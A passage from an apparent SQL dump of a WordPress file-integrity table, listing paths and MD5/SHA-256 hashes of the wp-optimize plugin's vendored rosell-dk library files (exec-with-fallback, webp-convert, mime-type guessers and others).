0000000000000000000000000,0x1EBBD3E34237AF26DA5DC08A4E440464,0xDB4017480BCEDFC101E5E54D3BEFBABE89352069D0DD192799E56FEDA43556F6,'',0,'?'),(0x15A01939D408548CEE436EEAA5C166F8,'wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/README.md','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/README.md',1,0x00000000000000000000000000000000,0x71A5C275E456596894E280C71468CF08,0xF7058BE0B0123B540F08AFA37478C4B01DA72AD759332C782D3581A86680B778,'',0,'?'),(0xC451550F25F66AAD8A2AE1C61BCC837E,'wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/composer.json','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/composer.json',1,0x00000000000000000000000000000000,0xE5B614B3786EAE7F6AF9B1DB0C14CD02,0xF080C269EF4638A120C2766BFA928ED5CC1B47E060EE8E9CC87030D882F10D12,'',0,'?'),(0xE2A72FB39FC71D0A5C9AC022ED9E53E0,'wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/phpstan.neon','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/phpstan.neon',1,0x00000000000000000000000000000000,0x91E7978965AAFEEEF8B7A0DEB0BD112B,0xB37266209179E047428C5C5113F4CA50440BE99B1BA87D3C2CA6C36B9BDEB9CA,'',0,'?'),(0xE8839189F4C6C84F95CAD521D3344D0F,'wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/phpunit.xml.dist','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/phpunit.xml.dist',1,0x00000000000000000000000000000000,0x1A8ED5E4449A0A0158EB80D8C1841F08,0x2DB3B72E8A266B57097AE52E2A0E45C60E506B782FE797284D251835FF5E938D,'',0,'?'),(0x7F249A2EEF4C5E46765691B57AFB6D96,'wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/phpunit.xml.dist.bak','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/phpunit.xml.dist.bak',1,0x00000000000000000000000000000000,0x17865778B6A00C36FBDACBE562769C52,0xE3F940DD9DBBD7722BF07C2E699B4C5BFAB91A82AC69925A00EF750FE50FE997,'',0,'?'),(0x49204A0B38D08308318A7ADC435D593A,'wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/src/Availability.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/src/Availability.php',1,0x00000000000000000000000000000000,0x429478A13172090EB520BC80AB13BA86,0xC94418118E0741DF63DCA45F023B5E1A1C4BB197F8EF6735DA4BB3DFBB643D65,'',0,'?'),(0xE4EF30B205D9888AB95AA67EB516A440,'wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/src/ExecWithFallback.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/src/ExecWithFallback.php',1,0x00000000000000000000000000000000,0xFA305CCF38334677FCD594E2C389C22B,0x8C7D4A73251AF890EB870B0A6EA6487767D3FDECBED5F1F09D1DCDD47C09BE63,'',0,'?'),(0x22400BB10A96FF0B7379E517B363D71B,'wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/src/ExecWithFallbackNoMercy.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/src/ExecWithFallbackNoMercy.php',1,0x00000000000000000000000000000000,0x8C09A3A9EEF44EBAFC10D42EF16E0686,0xAFD2D84E3B48E221DE63B6A80F28E6A8FD907FCA5916D903DC8BB7A9A37DA4A5,'',0,'?'),(0xB857B9A3E9E589B31D0765BF058E9749,'wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/src/POpen.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/src/POpen.php',1,0x00000000000000000000000000000000,0xA4DD5A539EDF9BE724082EA94F162E94,0xEE5C2CD896161C4D7EF16ECF9B005C8BDE9E7BB963294F3A9CE599E911925EBB,'',0,'?'),(0x9D17CE8528FBCA7521F3CA0C49184DE7,'wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/src/Passthru.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/src/Passthru.php',1,0x00000000000000000000000000000000,0x50862436E8EE33571B27007CFA7A636E,0xC6F62314921217BD06E4896F624A20A8ED9877711CF206551AEE36C043BE8995,'',0,'?'),(0x0E7615CF11274C69128978925A360CB7,'wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/src/ProcOpen.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/src/ProcOpen.php',1,0x00000000000000000000000000000000,0xBF1DB47E784D09C8A4F9063AAC57FC49,0xC51F486D478318768AA8D02909FBA23D7FB8C3BA2E07E0690E7FF95D35391597,'',0,'?'),(0xD0E62A7231FC8FC6E15CF6E4F2678639,'wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/src/ShellExec.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/src/ShellExec.php',1,0x00000000000000000000000000000000,0x73FD8BC5E8ACFB92449F6FA287BC60C4,0x5811D9B91AD869D82C4835CBC8B2DA12B19386EB3603BD9111A15351C52CCC19,'',0,'?'),(0x0DB339D40602915F467802D58BBFAD44,'wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/test.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/exec-with-fallback/test.php',1,0x00000000000000000000000000000000,0xD48639830BD06E3CED70FEB763EAF4C9,0x3C02DD0EF6335C339E9260DA516FC183DF0035CF1BA518F8265A7FFBB062BDDC,'',0,'?'),(0x553F3677DA54512B534DA3CB30CDB4C4,'wp-content/plugins/wp-optimize/vendor/rosell-dk/file-util/LICENSE','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/file-util/LICENSE',1,0x00000000000000000000000000000000,0x096C84951123595EEF3D75E901D6F804,0x72E7FA3D58FBDC2CAF166C55CA13F5EF2AFC465D93C6205A17515B36CF71D184,'',0,'?'),(0x733C42134228769DBDDCD08707522103,'wp-content/plugins/wp-optimize/vendor/rosell-dk/file-util/README.md','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/file-util/README.md',1,0x00000000000000000000000000000000,0x0078EC83FED3891B9602D9D7BA88A203,0x1EE10FDBA1F788D5CB6D9F01FCCD1144CF521AD34C4EB402230C8F00194791BF,'',0,'?'),(0x3BA30F161BAAB12B553F41D9E7209727,'wp-content/plugins/wp-optimize/vendor/rosell-dk/file-util/composer.json','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/file-util/composer.json',1,0x00000000000000000000000000000000,0x08F7A753311D076F9DA4E65CCE25DA96,0x616478518B25906008E7792F56E4E463E679D5A766CDCDF3E3E69B786ACDD6B0,'',0,'?'),(0x9EF04B9C4BDA3FC7AB05941E803C5E7D,'wp-content/plugins/wp-optimize/vendor/rosell-dk/file-util/phpcs-ruleset.xml','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/file-util/phpcs-ruleset.xml',1,0x00000000000000000000000000000000,0x0ED98A8F1D6A1F7B7C4475446EAA4254,0x2578F01A2C9C48D80318692A0504EE33DB570F3DC0F8B843A19F7006B5114228,'',0,'?'),(0x9187D124F5A2EC4019ADEAEB6501DBEE,'wp-content/plugins/wp-optimize/vendor/rosell-dk/file-util/src/FileExists.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/file-util/src/FileExists.php',1,0x00000000000000000000000000000000,0x2BD7C31ACD3EE46604975B071F10144F,0x51AFE79E8B68615622DC5E5835AB87CE82D23DC42F5C77265DA1FD3D51695CB0,'',0,'?'),(0xD9BB36333D93C7719DFCC3EF3D8C3E74,'wp-content/plugins/wp-optimize/vendor/rosell-dk/file-util/src/FileExistsUsingExec.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/file-util/src/FileExistsUsingExec.php',1,0x00000000000000000000000000000000,0xA39A1F800F765C6D1EC5DF12C5A6C4F2,0x533250586471A62971ED5F064A9D642207F497E4A18A825603C867CA8F4D0E69,'',0,'?'),(0x4573074D5F15A91062BE373887392EA8,'wp-content/plugins/wp-optimize/vendor/rosell-dk/file-util/src/PathValidator.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/file-util/src/PathValidator.php',1,0x00000000000000000000000000000000,0x994653D21109B02E6DB7AE6FAF2B0A96,0x82BA2C3E0F6D3BC92E03939A67A259E72D900BF9BC77F3983AA0A1FF72F3BED5,'',0,'?'),(0x4226021D9711B417A9E6B9029F67A335,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/LICENSE','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/LICENSE',1,0x00000000000000000000000000000000,0x096C84951123595EEF3D75E901D6F804,0x72E7FA3D58FBDC2CAF166C55CA13F5EF2AFC465D93C6205A17515B36CF71D184,'',0,'?'),(0xA76C9E690ABC0CDFFF4C753AC7507D93,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/phpcs-ruleset.xml','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/phpcs-ruleset.xml',1,0x00000000000000000000000000000000,0x0ED98A8F1D6A1F7B7C4475446EAA4254,0x2578F01A2C9C48D80318692A0504EE33DB570F3DC0F8B843A19F7006B5114228,'',0,'?'),(0x25D418E976AF13BDA7F741F9E8E5614D,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/phpstan.neon','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/phpstan.neon',1,0x00000000000000000000000000000000,0xA03DFDFE4127FE57156CD7C2E83852FD,0x3B4885D37EC7C60A9D66695DC6E16B6927F30FF5993C5DA58C510A82EB4A082B,'',0,'?'),(0xE7E3823D5C105E6591E5AA524EEAF846,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/Detectors/AbstractDetector.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/Detectors/AbstractDetector.php',1,0x00000000000000000000000000000000,0xFB7DC6B5FEF2B64E4C2A59F1B041C4D3,0xD3B7BF165D0885B55CB37E4AB635AD444EFC6EC4BB31D2AA4659536861AE79FA,'',0,'?'),(0x644A2AD8D2F1A87C475DE67E442407BC,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/Detectors/ExifImageType.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/Detectors/ExifImageType.php',1,0x00000000000000000000000000000000,0x95063DC90E4B7CB3284088ADD30B02EA,0x9206D4F6FBAE0E204A092BC52DB20DC304D2FFE23C22D50167FC282DCD359882,'',0,'?'),(0xC9933C6E179B4AB240A66EE27172DC2F,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/Detectors/FInfo.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/Detectors/FInfo.php',1,0x00000000000000000000000000000000,0x08312B998C068CD4404458BF2112B087,0x6970E86EED4A6D1EEFB1AF2ED32A8F3480C925BA016D7ED34DE40C9BC571285E,'',0,'?'),(0xDAA0C6E337072BC1F63429960643C81A,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/Detectors/GetImageSize.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/Detectors/GetImageSize.php',1,0x00000000000000000000000000000000,0x3DBA3CDED64A1323CFD7D92F89D7F360,0xEE7B5BD1CED92215C566025D6E4F992083F008B0FE885E1F763ACBE3AA09B4C2,'',0,'?'),(0xAD92683AD5F07D108F7474706BCFD349,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/Detectors/MimeContentType.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/Detectors/MimeContentType.php',1,0x00000000000000000000000000000000,0xF7F5893FA6A178C417AFE526D59356FD,0x91B427DCF40FAF3A24ADD372EFBF479050E4EFBB340C62BFE64FADA00CBF1383,'',0,'?'),(0x011D680E6CDF38E5E458BBDEDAC577B0,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/Detectors/SignatureSniffer.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/Detectors/SignatureSniffer.php',1,0x00000000000000000000000000000000,0xCF5613412E497E30BD9B5770B4C41202,0x3216B963234EE26F275D0A4F9D97285C454A4FB50DF4147C501F901754EA017F,'',0,'?'),(0x7E092C7830D92D0F0E9451E8868B028B,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/Detectors/Stack.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/Detectors/Stack.php',1,0x00000000000000000000000000000000,0xCF7C8598BD2C2244FCAA5A51D1EA5923,0xF04FB61DAAEB5150490F1BA291A93FC33C423010137A364CB9A87DC2FB720EE9,'',0,'?'),(0xEDCB8B0C9E3D81B007A7FAF10381A244,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/GuessFromExtension.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/GuessFromExtension.php',1,0x00000000000000000000000000000000,0xB2F94B1A768C657929C13B556A1927F8,0x6987BF17C0D2066F0194850C4EC730206441DEBCC66531413D5B783975577A7C,'',0,'?'),(0x8FAD02AF78AA06BA87462A73C158C5A7,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/ImageMimeTypeGuesser.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/ImageMimeTypeGuesser.php',1,0x00000000000000000000000000000000,0xFFC21E13B4ABFADF330ECE2E969C029A,0xA7C909FE145616407B059205082BCF09C567F396BCFDBEEDCACF1A92D14C2518,'',0,'?'),(0x7B01945EB93DD6249B93D12D08B93405,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/MimeMap.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-guesser/src/MimeMap.php',1,0x00000000000000000000000000000000,0xFCF811679F9BFD4FEFDC8830DE156EF4,0xE9648FCCD9A00CEEAF818B91211138E59D571CAF99556A8D6B6CD6524504F38B,'',0,'?'),(0x5D13093E210C633C3BC353CC06DDC7FD,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-sniffer/LICENSE','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-sniffer/LICENSE',1,0x00000000000000000000000000000000,0x096C84951123595EEF3D75E901D6F804,0x72E7FA3D58FBDC2CAF166C55CA13F5EF2AFC465D93C6205A17515B36CF71D184,'',0,'?'),(0xA2CD0BCDE6D8A986CA6260A9E6EDEA4F,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-sniffer/README.md','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-sniffer/README.md',1,0x00000000000000000000000000000000,0xF7E6B3C8EE85DEBA16AF369C16914F3F,0xEDF1A60B2EDE0877F940F2109C80ACB2C8BB54C86A0C6B0BCE0C9F562EF73603,'',0,'?'),(0x942CE396CAE2BF2CA2E82751132317EC,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-sniffer/composer.json','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-sniffer/composer.json',1,0x00000000000000000000000000000000,0x65D5312D32E6DCA1F056021C74A73BD9,0x937CD7119A84199A9DA8D9A7485E71687805E8BBC238A80DF1DC41CD6BDAB661,'',0,'?'),(0x34AFA18ADD0B4676D8EE70FE84A1972F,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-sniffer/phpcs-ruleset.xml','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-sniffer/phpcs-ruleset.xml',1,0x00000000000000000000000000000000,0x0ED98A8F1D6A1F7B7C4475446EAA4254,0x2578F01A2C9C48D80318692A0504EE33DB570F3DC0F8B843A19F7006B5114228,'',0,'?'),(0xBA8EA40063883B056C19ED4A4F36A9C1,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-sniffer/phpunit.xml.dist','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-sniffer/phpunit.xml.dist',1,0x00000000000000000000000000000000,0x0AD35864FCCEE96C97B21774D2D96665,0x2918CAD36991F8FA325DD6BE055FF82A72EEE6759331B9F91CA58D4F93C081B3,'',0,'?'),(0x10A7D94DAC9B7B425B460FA99E0B319B,'wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-sniffer/src/ImageMimeTypeSniffer.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/image-mime-type-sniffer/src/ImageMimeTypeSniffer.php',1,0x00000000000000000000000000000000,0x0607B3EBDD8B5241CB99E2120B2293DE,0xC0E3DBCCD2D032218E402A3E79FB333863C302E4A0F629FBE1ED9E12CF110A8F,'',0,'?'),(0x6E67CB47491D9D34D2EE738D28E7E754,'wp-content/plugins/wp-optimize/vendor/rosell-dk/locate-binaries/LICENSE','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/locate-binaries/LICENSE',1,0x00000000000000000000000000000000,0x096C84951123595EEF3D75E901D6F804,0x72E7FA3D58FBDC2CAF166C55CA13F5EF2AFC465D93C6205A17515B36CF71D184,'',0,'?'),(0x01BD57CF5DD2EF5FCFE378E04CD05A38,'wp-content/plugins/wp-optimize/vendor/rosell-dk/locate-binaries/README.md','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/locate-binaries/README.md',1,0x00000000000000000000000000000000,0xEA9A9AF87029A9D1510D7630B56C7C3C,0x456C88325963187607AF1152BDA1B9F4AFB2DB2404AC5EC6C55CCC271A5D0007,'',0,'?'),(0x784AA2B0A202E2F9BCC998597477A064,'wp-content/plugins/wp-optimize/vendor/rosell-dk/locate-binaries/composer.json','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/locate-binaries/composer.json',1,0x00000000000000000000000000000000,0xEE6F956C28E23B14EF85145C57CFCF68,0x899D44AA6AB786E6349987D837CB18BFEF31CAB969127086841F87BA982FE763,'',0,'?'),(0x9C590A59547CE001E330DAD740518A76,'wp-content/plugins/wp-optimize/vendor/rosell-dk/locate-binaries/phpcs-ruleset.xml','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/locate-binaries/phpcs-ruleset.xml',1,0x00000000000000000000000000000000,0x0ED98A8F1D6A1F7B7C4475446EAA4254,0x2578F01A2C9C48D80318692A0504EE33DB570F3DC0F8B843A19F7006B5114228,'',0,'?'),(0x8C7979D6C8DA6791246573D65A1647EE,'wp-content/plugins/wp-optimize/vendor/rosell-dk/locate-binaries/src/LocateBinaries.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/locate-binaries/src/LocateBinaries.php',1,0x00000000000000000000000000000000,0x35AA9E2E1D82FCC048ABCAC263A38D30,0x8C8AF3470C23A3A5AD46CF39AA9067A0D23828E1D7D7D94A141DE6236464288B,'',0,'?'),(0xAF246562769F1BE9BFEF5F6569AF1C8B,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/LICENSE','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/LICENSE',1,0x00000000000000000000000000000000,0x096C84951123595EEF3D75E901D6F804,0x72E7FA3D58FBDC2CAF166C55CA13F5EF2AFC465D93C6205A17515B36CF71D184,'',0,'?'),(0x6DE2D28B7232E087F9EB76623C70260C,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/phpcs-ruleset.xml','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/phpcs-ruleset.xml',1,0x00000000000000000000000000000000,0x0ED98A8F1D6A1F7B7C4475446EAA4254,0x2578F01A2C9C48D80318692A0504EE33DB570F3DC0F8B843A19F7006B5114228,'',0,'?'),(0x36A99D1A009629E08853EB6F23725B08,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/phpunit-with-coverage.xml.dist','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/phpunit-with-coverage.xml.dist',1,0x00000000000000000000000000000000,0xAE0C677ED6A3BD485A6100E18EAA17D7,0x847799DF6BA5CEE657E4620701CAD3B5DC46E7D93B876F3A398A19B8AF95D5B4,'',0,'?'),(0x588DADE4CB7B29BD3F4783CD1F77EE3F,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/ConverterFactory.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/ConverterFactory.php',1,0x00000000000000000000000000000000,0xE142C07BD5D2375EE97EB035F1EA9947,0xEC3A792EAAE3703E97B3CC7E16BDA247AF384CDE81A126DA4B8F2B484174E63B,'',0,'?'),(0x370703F7E7832CEED5F08C8BBF0F3CCB,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/AbstractConverter.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/AbstractConverter.php',1,0x00000000000000000000000000000000,0xC369A9E00E3FA705CB6780BFA3DD693E,0xDCD95381E8994D407B4A59B706A231856B39E6DF95E2F0EB105464C99F210ABF,'',0,'?'),(0x60B2BA3AB7C2B3F4CDDCCD590B8BEA80,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/BaseTraits/AutoQualityTrait.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/BaseTraits/AutoQualityTrait.php',1,0x00000000000000000000000000000000,0x75E44BBCA746C1626627727DC9C757EB,0x30987DC82ABCEA6ED36302FAF7433988FB982357954AEE01D2D1EDE1C06CAD3D,'',0,'?'),(0xC1CE987A313B16B866388491832DBEC3,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/BaseTraits/DestinationPreparationTrait.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/BaseTraits/DestinationPreparationTrait.php',1,0x00000000000000000000000000000000,0x7B52DEBD13BC7D82C5F63AF188B99E34,0x4144967D8C8E7AA74233C7CD108E85BEFA2C1A9B765E13F18D409D547A269761,'',0,'?'),(0x78C9AD35AF1A3956216554F7B9AD0635,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/BaseTraits/LoggerTrait.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/BaseTraits/LoggerTrait.php',1,0x00000000000000000000000000000000,0x9972B090292EC458FEC369BA40A54B53,0x699B156CD5E085367E3FD8EDD32B5AF2205D5F3BE688BC3922A3C3BC8843B248,'',0,'?'),(0xA556139B4040917B3AECFF24624B9DAA,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/BaseTraits/OptionsTrait.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/BaseTraits/OptionsTrait.php',1,0x00000000000000000000000000000000,0x5BFC0E3486C95B991A885605BE1451F4,0xB22FF8FB321EF29646BF291A1B835CF7BA02F17569C2343BD2F94566FEDEBE3B,'',0,'?'),(0xE6055798F115B8DDDB999ECA7C83F7F5,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/BaseTraits/WarningLoggerTrait.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/BaseTraits/WarningLoggerTrait.php',1,0x00000000000000000000000000000000,0xD5F0323EA72872A3353094B5FB8402FC,0x5BF558FC14489A47D31CE91B62D6A7CEA36EBDFCBF92309E1E5E4F33A7587F6F,'',0,'?'),(0x9782A6A36385464A46D3561248981DBA,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/ConverterTraits/CloudConverterTrait.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/ConverterTraits/CloudConverterTrait.php',1,0x00000000000000000000000000000000,0xCE0FEF1BEF7AF0C9081AE21832E1D8EC,0x856111AEACEB609F23CAC82759FAFB69F40D0254BD25C11B525647FBE9304E3D,'',0,'?'),(0xEC55C687A2BA1C5D7457CFC02840022C,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/ConverterTraits/CurlTrait.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/ConverterTraits/CurlTrait.php',1,0x00000000000000000000000000000000,0xE51CC2267FA49EB6C6F0C7F78C250216,0x4941BEE679220E426AAC6E7F9D51C5D0A17A371DC1FC997C1741B0B384951276,'',0,'?'),(0x3069C1DDC81396AB0369F6409FB2C205,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/ConverterTraits/EncodingAutoTrait.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/ConverterTraits/EncodingAutoTrait.php',1,0x00000000000000000000000000000000,0xE6B3D9129A7C7AB66AC17F458E430A42,0x8D38F6F74021FF921BEC5E1046D8F87B29D40D65B67E9FE44F84C44A33DF95B0,'',0,'?'),(0x02A6CFD1E093874F693F003CF5D90A51,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/ConverterTraits/ExecTrait.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/ConverterTraits/ExecTrait.php',1,0x00000000000000000000000000000000,0x00F7D2477987C19903C9EF4FF692E4F7,0x5123E20766DD03793416406B5C35A09F2C477C744A70506CB429202A3C56F80C,'',0,'?'),(0xFDABD46F999600E2F30539CC605A001F,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Cwebp.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Cwebp.php',1,0x00000000000000000000000000000000,0xDC89670750FE3DF6EB44A595A15AC31F,0xBBFB839C032DBC1E5FAC7891677174DFFD3532274219CF4A09EFE70213B98C9D,'',0,'?'),(0xBA207195463A52607310D66A506EC7A9,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Ewww.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Ewww.php',1,0x00000000000000000000000000000000,0x3303866DB2FC167FE14DABC652E21C15,0x8E9AF39153F363D8F3E1A0A0182A11DB045EE9409DE7F86C8B95C4E094D4852F,'',0,'?'),(0xD14583FB76D0A00D3E40407C5B6CB70B,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/FFMpeg.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/FFMpeg.php',1,0x00000000000000000000000000000000,0x68865E5353C118DBC7603527B8BB9191,0x695684A89E59024F566A58250E5855636132FC728865E124AC80BBD11C9A7C99,'',0,'?'),(0x1F739B3A6907F2B431CB1B115E844928,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Gd.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Gd.php',1,0x00000000000000000000000000000000,0x75E90F9F2B9F490A60E4208D49C4D1EC,0x4AAB3D39404D11C3148D75D76451441FAE7DE5220F460BBF673A23C5ED8B6391,'',0,'?'),(0xC95716D0365B250373BEEC11F3B9FA94,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Gmagick.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Gmagick.php',1,0x00000000000000000000000000000000,0x21B8DF7DF2C98591581339F9AB207B26,0x746131655FC04138D639B8FAEF556713888E391842AC9DA1C79DAD05BEA9710B,'',0,'?'),(0xDA1E3FFC43EAF9E9927444F2D6B016B7,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/GmagickBinary.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/GmagickBinary.php',1,0x00000000000000000000000000000000,0x735048CB2F69524AF5965E278B252C0A,0x80CB435B075831025412462A69EDAFAA3DF92EA6BCFBFBE65FD1B9A6EED6CA39,'',0,'?'),(0x6405F38710F8B418AEF5F9F30E277